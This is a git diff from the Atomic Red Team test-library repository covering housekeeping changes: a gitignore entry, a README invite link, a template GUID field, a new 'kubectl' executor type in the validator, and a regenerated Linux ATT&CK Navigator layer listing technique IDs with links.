diff --git a/.gitignore b/.gitignore
index f2f8d099..652699ed 100644
--- a/.gitignore
+++ b/.gitignore
@@ -24,3 +24,6 @@ docs/.sass-cache/
 docs/_site/
 **/Invoke-AtomicTest-ExecutionLog.csv
 techniques_hash.db
+
+# Credential files 
+*.creds
\ No newline at end of file
diff --git a/README.md b/README.md
index a1258851..0a0bc26d 100644
--- a/README.md
+++ b/README.md
@@ -34,7 +34,7 @@ See: https://atomicredteam.io
 
 ## Having trouble?
 
-Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
+Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link))
 
 ## Getting Started
 
diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb
index dd71601b..d2dbbe9b 100644
--- a/atomic_red_team/atomic_doc_template.md.erb
+++ b/atomic_red_team/atomic_doc_template.md.erb
@@ -25,13 +25,17 @@
   end
 end.join(', ') %>
 
+
+**auto_generated_guid:** <%= test['auto_generated_guid'] %>
+
+
 <%def cleanup(input)
     input.to_s.strip.gsub(/\\/,"&#92;")
 end%>
 
 <% if test['input_arguments'].to_a.count > 0 %>
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 <% test['input_arguments'].each do |arg_name, arg_options| -%>
 | <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
@@ -75,7 +79,7 @@ end%>
 ##### Description: <%= dep['description'].strip  %>
 ##### Check Prereq Commands:
 ```<%= get_language(dependency_executor) %>
-<%= dep['prereq_command'].strip %> 
+<%= dep['prereq_command'].strip %>
 ```
 ##### Get Prereq Commands:
 ```<%= get_language(dependency_executor) %>
diff --git a/atomic_red_team/atomic_red_team.rb b/atomic_red_team/atomic_red_team.rb
index 24a4c811..f7b63964 100755
--- a/atomic_red_team/atomic_red_team.rb
+++ b/atomic_red_team/atomic_red_team.rb
@@ -142,7 +142,7 @@ class AtomicRedTeam
       raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
       raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
   
-      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud']
+      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
       case executor['name']
         when 'manual'
           raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +152,7 @@ class AtomicRedTeam
                                          string: executor['steps'],
                                          string_description: "atomic_tests[#{i}].executor.steps"
 
-        when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud'
+        when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
           raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
           raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
 
diff --git a/atomic_red_team/spec.yaml b/atomic_red_team/spec.yaml
index 9ccd2b42..7f34d392 100644
--- a/atomic_red_team/spec.yaml
+++ b/atomic_red_team/spec.yaml
@@ -115,7 +115,7 @@ atomic_tests:
   # a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
   # per test, but there are cases where you may have multiple - for example, separate executors for `sh`
   # and `bash` when working on linux OSes.
-  # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, and `gcloud`.
+  # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
   executors:
   # the name of the executor describes the framework or application in which the test should be executed.
   #
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index fbe9e18a..cc0218bb 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
index 23c8d246..09dc27c0 100644
